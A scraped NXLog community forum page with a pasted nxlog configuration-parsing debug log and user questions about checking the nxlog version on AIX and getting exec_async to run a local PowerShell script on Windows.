/opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] new function: file_exists 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] adding string [/opt/nxlog/var/log/nxlog/nxlog.log] 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] string literal declared at line 115, character 116 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] literal 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] integer literal: 8 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] integer literal declared at line 115, character 119 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] literal 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] nx_expr_new_procedure: file_cycle 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] global procedure: file_cycle 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure log_debug (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure debug (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure log_info (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure log_warning (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure log_error (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete_all (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_var (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_var (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_var (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete_var (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure set_var (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete_stat (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure add_stat (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure add_stat (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure sleep (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure drop (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure rename_field (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure rename_field (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure reroute (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure add_to_route (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure duplicate_guard (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure module_stop (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure module_start (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure module_restart (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure parse_xml (_xml - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure parse_xml (_xml - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure to_xml (_xml - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure parse_windows_eventlog_xml (_xml - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure parse_windows_eventlog_xml (_xml - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure start_scan (fim - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure reconnect (fileout - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure file_cycle (_fileop - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure file_cycle (_fileop - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] file_cycle declared at line 115, character 121 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] procedure 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] statement: procedure 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] if-else declared at line 115, character 121 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] if 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] finished parsing statements 2022-08-25 16:12:59 DEBUG [CORE|main] parsing path: filein => fileout 2022-08-25 16:12:59 DEBUG [CORE|main] adding module filein to route parse_xml 2022-08-25 16:12:59 DEBUG [CORE|main] adding module fileout to route parse_xml 2022-08-25 16:12:59 DEBUG [CORE|main] parsing path: fim => fileout 2022-08-25 16:12:59 DEBUG [CORE|main] adding module fim to route 3 2022-08-25 16:12:59 DEBUG [CORE|main] adding module fileout to route 3 2022-08-25 16:12:59 INFO [CORE|main] configuration OK 2022-08-25 16:12:59 DEBUG [CORE|main] nxlog_shutdown() enter 2022-08-25 16:12:59 DEBUG [CORE|main] stopping INPUT modules 2022-08-25 16:12:59 DEBUG [CORE|main] stopping module fim 2022-08-25 16:12:59 DEBUG [CORE|main] stopping module filein 2022-08-25 16:12:59 DEBUG [CORE|main] stopping PROCESSOR modules 2022-08-25 16:12:59 DEBUG [CORE|main] stopping OUTPUT modules 2022-08-25 16:12:59 DEBUG [CORE|main] stopping module fileout 2022-08-25 16:12:59 DEBUG [CORE|main] stopping EXTENSION modules 2022-08-25 16:12:59 DEBUG [CORE|main] stopping module _fileop 2022-08-25 16:12:59 DEBUG [CORE|main] stopping module _xml 2022-08-25 16:12:59 DEBUG [CORE|main] stopping module multiline 2022-08-25 16:12:59 DEBUG [CORE|main] shutdown_modules: INPUT 2022-08-25 16:12:59 DEBUG [CORE|main] Module pool FREE (filein) : 0x1100f3358 2022-08-25 16:12:59 DEBUG [CORE|main] Module pool FREE (fim) : 0x110105a38 2022-08-25 16:12:59 DEBUG [CORE|main] shutdown_modules: PROCESSOR 2022-08-25 16:12:59 DEBUG [CORE|main] shutdown_modules: OUTPUT 2022-08-25 16:12:59 DEBUG [CORE|main] Module pool FREE (fileout) : 0x110118178 2022-08-25 16:12:59 DEBUG [CORE|main] shutdown_modules: EXTENSION 2022-08-25 16:12:59 DEBUG [CORE|main] Module pool FREE (multiline) : 0x1100ed0b8 2022-08-25 16:12:59 DEBUG [CORE|main] Module pool FREE (_xml) : 0x1100f0cf8 2022-08-25 16:12:59 DEBUG [CORE|main] Module pool FREE (_fileop) : 0x11012a918 2022-08-25 16:12:59 DEBUG [CORE|main] no entries found, not writing configcache.dat 2022-08-25 16:12:59 DEBUG [CORE|main] nxlog_shutdown() leave 2022-08-25 16:12:59 DEBUG [CORE|main] shutdown_modules: INPUT 2022-08-25 16:12:59 DEBUG [CORE|main] shutdown_modules: PROCESSOR 2022-08-25 16:12:59 DEBUG [CORE|main] shutdown_modules: OUTPUT 2022-08-25 16:12:59 DEBUG [CORE|main] shutdown_modules: EXTENSION 2022-08-25 16:12:59 DEBUG [CORE|main] Module pool FREE (CORE) : 0x10029B78

SISA
Replies: 1
View post »
Klevin
NXlog version
Hi Team, Nxlogger is installed on the IBM AIX, but am not able to find the nxlogger version with the below command. nxlog -v nxlog -V

SISA
Replies: 1
View post »
Klevin
nxlog-ce-3.0.2284 on Windows, exec_async can not running powershell or batch script...
Hello! I would execute an simple powershell script that only creates a folder, at every incoming ERROR message. But can not running powershell script! My config file is as follows: <Input 1> Module im_tcp host 0.0.0.0 Port 514 Exec parse_syslog(); </Input> <Output out> Module om_file Module xm_exec File &quot;C:\\NXlogs\\Test_Log.log&quot; exec if $raw_event =~ /ERROR/ exec_async(&quot;C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe&quot;, &quot;-ExecutionPolicy&quot;, &quot;Bypass&quot;, &quot;-command&quot;, &quot;‪‪C:\\NXlogs\\test.ps1&quot;); </Output> <Route > Path 1 => out </Route> After running it got error message like: 2022-09-07 15:21:22 ERROR subprocess 'C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe' was terminated by a signal. Even running notpad.exe or a batch script have got same error like: ERROR subprocess ................. was terminated by a signal. Does anyone know what is the reason?

shinee
Replies: 1
View post »
shinee